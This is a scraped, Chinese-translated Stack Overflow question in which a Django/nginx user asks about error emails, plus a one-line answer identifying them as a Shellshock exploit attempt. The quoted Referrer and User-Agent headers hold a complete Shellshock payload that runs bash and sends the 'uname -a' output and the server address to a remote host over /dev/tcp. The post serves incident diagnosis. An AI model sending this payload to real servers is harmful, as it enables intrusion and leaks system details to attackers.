/cgi-bin/inde-6ren">
gpt4 book ai didi

Django 可能的安全攻击

转载 作者:行者123 更新时间:2023-12-05 00:21:47 24 4
gpt4 key购买 nike

我已经设置 django 以在任何请求失败时通过电子邮件提醒我,并且我不断收到这封电子邮件:

Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1

这是什么意思?我应该打扰吗?

我正在使用 nginx、ubuntu、gunicorn。

最佳答案

企图利用shell shock脆弱性。

关于Django 可能的安全攻击,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/30989092/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com